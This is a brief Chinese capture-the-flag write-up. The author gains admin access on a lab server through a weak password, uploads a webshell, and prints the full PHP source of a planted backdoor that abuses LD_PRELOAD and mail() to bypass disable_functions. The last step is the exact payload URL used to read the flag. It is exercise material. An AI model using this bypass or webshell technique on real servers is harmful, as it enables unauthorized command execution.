去你的,半天没找到注入点

进入主页后会发现有一个admin登录点

接下来直接一个弱口令爆破,然会就进后台了,upload直接打上去

也是顺利拿到shell了

但是发现这个shell似乎没什么用,更目录也没flag

那就先扫一下源码看看有没有什么漏洞,找到一个后门,那么我们看看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
    echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";

    $cmd = $_GET["cmd"];
    $out_path = $_GET["outpath"];
    $evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
    echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";

    putenv("EVIL_CMDLINE=" . $evil_cmdline);

    $so_path = $_GET["sopath"];
    putenv("LD_PRELOAD=" . $so_path);

    mail("", "", "", "");

    echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>"; 

    unlink($out_path);
?>

由这个源码可知,这是调用一个so进行相关服务的,而且原密码也给出示例payload,那就直接打

1
http://node4.anna.nssctf.cn:28522/bootstrap/test/bypass_disablefunc.php?cmd=env&outpath=/var/www/html/bootstrap/3.txt&sopath=/var/www/html/bootstrap/test/bypass_disablefunc_x64.so

cmd后面跟服务名称,outpath后面跟上任意文件路径即可,然后就出了